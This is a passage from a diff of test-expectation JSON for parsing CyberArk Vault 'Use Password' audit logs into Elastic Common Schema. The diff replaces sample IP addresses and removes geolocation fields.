System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003etesting\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", "station": "10.0.2.2", "action": "Use Password", @@ -724,8 +670,8 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-06-09T10:24:32.349004900Z", - "original": "\u003c5\u003e1 2021-03-11T20:23:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003etesting\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:17\",\"IsoTimestamp\":\"2021-03-11T20:23:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374522Z", + "original": "\u003c5\u003e1 2021-03-11T20:23:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003etesting\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:17\",\"IsoTimestamp\":\"2021-03-11T20:23:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -748,39 +694,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -796,7 +721,7 @@ }, "@timestamp": "2021-03-14T13:49:35.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -807,23 +732,22 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:35Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -835,9 +759,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Use Password", "timestamp": "Mar 14 06:49:35", "desc": "Use Password" @@ -848,8 +772,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349048100Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374527900Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -873,39 +797,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -921,7 +824,7 @@ }, "@timestamp": "2021-03-15T10:31:54.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -932,23 +835,22 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:31:54Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n 